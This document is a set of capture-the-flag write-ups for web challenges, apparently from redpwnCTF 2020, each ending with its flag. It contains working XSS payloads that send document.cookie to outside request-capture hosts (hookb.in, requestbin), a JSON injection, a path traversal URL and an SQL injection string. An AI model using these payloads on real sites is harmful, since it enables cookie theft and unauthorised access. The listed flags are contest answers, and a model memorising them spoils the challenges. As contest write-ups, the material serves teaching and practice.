Inspect element, the flag will be in the <head>

Flag: flag{1nspector_g3n3ral_at_w0rk}

so uh reconstruct the pub key info asn1 by hand (or use a converter)

30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 
00 03 82 01 0f
 00 30 82 01 0a
 02 82 01 01 

 00 b9 f7 ee 5a 16 2b a5 35 bc 71 d7 00 59 4c 1e 4f ca 19 60 2a 7f f2 92 8f 62 3e 1e 67 7a 5d ee 68 58 a0 29 12 49 ea 99 e5 ef 8b df 73 b7 f1 2a 0c 00 da 20 33 53 41 6b 26 25 ba 63 9c 3f 10 bf 0b d3 c7 30 5e 80 95 a2 c3 1f ec 97 fc 58 3e 6b 4e 79 9b 43 bb fb 9a 49 35 45 6e 46 7f 73 ed a6 21 86 e6 e7 47 28 e4 d9 c5 53 1c b9 8e 1e a2 bd 14 f3 35 40 10 5d a2 e7 5d 32 06 58 13 aa 65 68 17 41 20 cc 10 f2 dc 6e 65 0b 3a b7 ce b6 cc 97 c0 d3 f7 20 4f 8e d3 b6 24 cd 92 8b 87 90 0b 93 55 70 4f 71 b3 39 a5 72 2e ec ca 1f 94 9a d4 8d 0d 25 8e e3 88 16 05 d0 ef 00 85 ba c5 eb 22 9b ee 56 9a 8b cd 1b d3 0f af 46 03 b0 a3 d0 3b 7d 8a 3e ca 3e b0 45 33 68 c5 c9 1f 2f 9e 6e 70 f9 3e ac 19 a7 d7 80 91 04 8f 4b 0b 99 b2 11 79 67 0d 7b 21 c2 d9 39 7d 3a 78 b2 30 4a 8f 78 bb 19 a1

 02 03 01 00 01

create sha2 hash and then do look up on cert.sh

get common name

oa4gio7glypwggb9iu3rh8mrc87tnjbs.flag.ga

Flag: flag{c3rTific4t3_7r4n5pArAncY_fTw}

Just pasted xss filter bypasses until one gave an alert('xss'), then refined it to send us the cookie.

<IFRAME SRC="javascript:document.location='https://hookb.in/b9gRBDkwpJT3DDogQ73Q?test='+document.cookie"></IFRAME>

(HTTPS was required)

flag{wh0_n33d5_d0mpur1fy}

So, for this challenge, we need to set the "member" parameter in the json to something that is not 0, ideally 1. idk all the techincal stuff but i just tried to inject stuff into the json Since we still need valid json for it to work, I first gave the name a junk value, and then closed the quote, created a new member parameter, gave it the value 1, and then finally created a random parameter with a junk value to make sure it was valid json. Final payload (just use this as a username) hi","member":1,"hi":"hi

which gets you the flag: flag{t0ny_5uck5_47_w3b_l0l}

Flag: flag{1_c4nt_f1nd_4_g00d_p4nd4_pun}

There are two checks made to the page parameter:

1. If the first char is not alphanumeric, remove it, and keep removing until an alphanumeric char is found

2. If the string "../" (and basically all variants, url encoding etc.) are present, replace them with nothing, and keep replacing until none are left.

We can bypass this by having a decoy path parameter as something random (as long as its not an actual dir i think its fine), and then having an "&&path=" to add another path variable, which is unfiltered.

Therefore, our final payload becomes:

https://tux-fanpage.2020.redpwnc.tf/page?path=a&&path=/../../index.js

which gets us our flag!

Flag: flag{tr4v3rsal_Tim3}

So first things first, create a pastebin. When you go to the display, you'll see a url like https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPXggb25lcnJvcj0iZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj11YjgyWGIxQzhvcyciPg==

That looks kinda like base64, and if you base64 decode the thing after https://static-pastebin.2020.redpwnc.tf/paste/# you'll find it decodes to the content of the pastebin! This allows us to easily create pastebin messages.

There's also an admin bot submit form, where we can submit a url, and the admin bot will visit it.

Rak found that the xss ><img src='' onerror="javascript code"> worked.

First, we can try a simple redirect. ><img src='' onerror="document.location='requestbinurl'">. I set up a requestbin for this purpose. Remember: we base64 encode the payload, and append it to the major part of the url.

https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPScnIG9uZXJyb3I9J2RvY3VtZW50LmxvY2F0aW9uPSJodHRwOi8vcmVxdWVzdGJpbi5uZXQvci8xbGZyZnlpMSInPg==, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.

><img src='' onerror='document.location="http://requestbin.net/r/1lfrfyi1?thing=" + document.cookie'>

This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64 encoding and submitting this as a url, a request on the requestbin pops up with the parameters ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag,

flag{54n1t1z4t10n_k1nd4_h4rd}

Basic SQL injection:

aaa' OR 1=1 --]

in both fields.

Flag: flag{0bl1g4t0ry_5ql1}